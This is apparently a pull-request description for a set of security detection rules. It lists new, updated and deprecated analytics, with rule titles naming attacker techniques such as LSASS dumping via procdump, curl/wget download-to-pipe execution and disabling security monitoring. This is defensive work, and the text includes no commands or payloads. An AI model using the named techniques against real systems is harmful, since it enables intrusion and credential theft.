New Rules & Updates - Oct 25

[nasbench]

This PR introduces a couple new analytics, fixes some reported issues and add multiple updates. See below for details:

Adding Missing Data Sources

The first set of update is to a bunch of rules that had an DS defined but not linked in the rule. Now this is fixed (the rest of the rules either are experimental and/or have no DS defined).

• O365 Elevated Mailbox Permission Assigned
• O365 Mailbox Folder Read Permission Assigned
• O365 Mailbox Folder Read Permission Granted
• Processes Tapping Keyboard Events
• Suspicious PlistBuddy Usage via OSquery
• Windows Debugger Tool Execution
• Windows Process Writing File to World Writable Path
• Detect ARP Poisoning
• Detect IPv6 Network Infrastructure Threats
• Detect Port Security Violation
• Detect Rogue DHCP Server
• Detect Traffic Mirroring
• Windows Create Local Account

New Rules

• Advanced IP or Port Scanner Execution
• Windows Defender ASR or Threat Configuration Tamper
• Windows NirSoft Tool Bundle File Created
• Windows PowerShell Process Implementing Manual Base64 Decoder
• Windows Process Execution From RDP Share
• Windows PsTools Recon Usage
• Windows WBAdmin File Recovery From Backup
• File Download or Read to Pipe Execution - This is a rewrite, a combination and a more generic logic of the 2 deprecated rules wget/curl (see deprecated section)

Rule Updates / Issues Fixes

• Updated Detect New Local Admin account by adding the raw field TargetUserName in the condition in order to provide a generic fix for [BUG] Detect New Local Admin Account #3730
• Updated Dump LSASS via procdump with additional flags and process names
• Updated Powershell Disable Security Monitoring with additional Cmdlet and their aliases as well as enhanced the logic to be more accurate
• Updated Web or Application Server Spawning a Shell by adding wildcards to some process names to be more generic
• Overhauled the logic of Windows AdFind Exe to be more generic and capture more common abuse vectors as reported by various threat intel sources.
• Updated Windows EventLog Recon Activity Using Log Query Utilities by adding OriginalFileName fields for better coverage.
• Enhanced file paths in Windows File Transfer Protocol In Non-Common Process Path and Windows Mail Protocol In Non-Common Process Path in order to reduce FP
• Enhanced the logic of Windows SSH Proxy Comman by adding new variants of execution.
• Added local IP filters for Detect Regasm with Network Connection, Detect Regsvcs with Network Connection, LOLBAS With Network Traffic,

Lookup Updates

• cisco_secure_firewall_filetype_lookup - Added untruffled Arcan Door rule
• is_nirsoft_software - Add wildcards and additional nirsoft tooling

Macro Updates

• windows_shells - Reworked the logic to use the IN operator for ease of reading, also added powershell_ise, WindowsTerminal, wt and mshta

Deprecated Rules

• Wget Download and Bash Execution
• Curl Download and Bash Execution
• W3WP Spawning Shell

[patel-bhavin]

neat PR description and updates!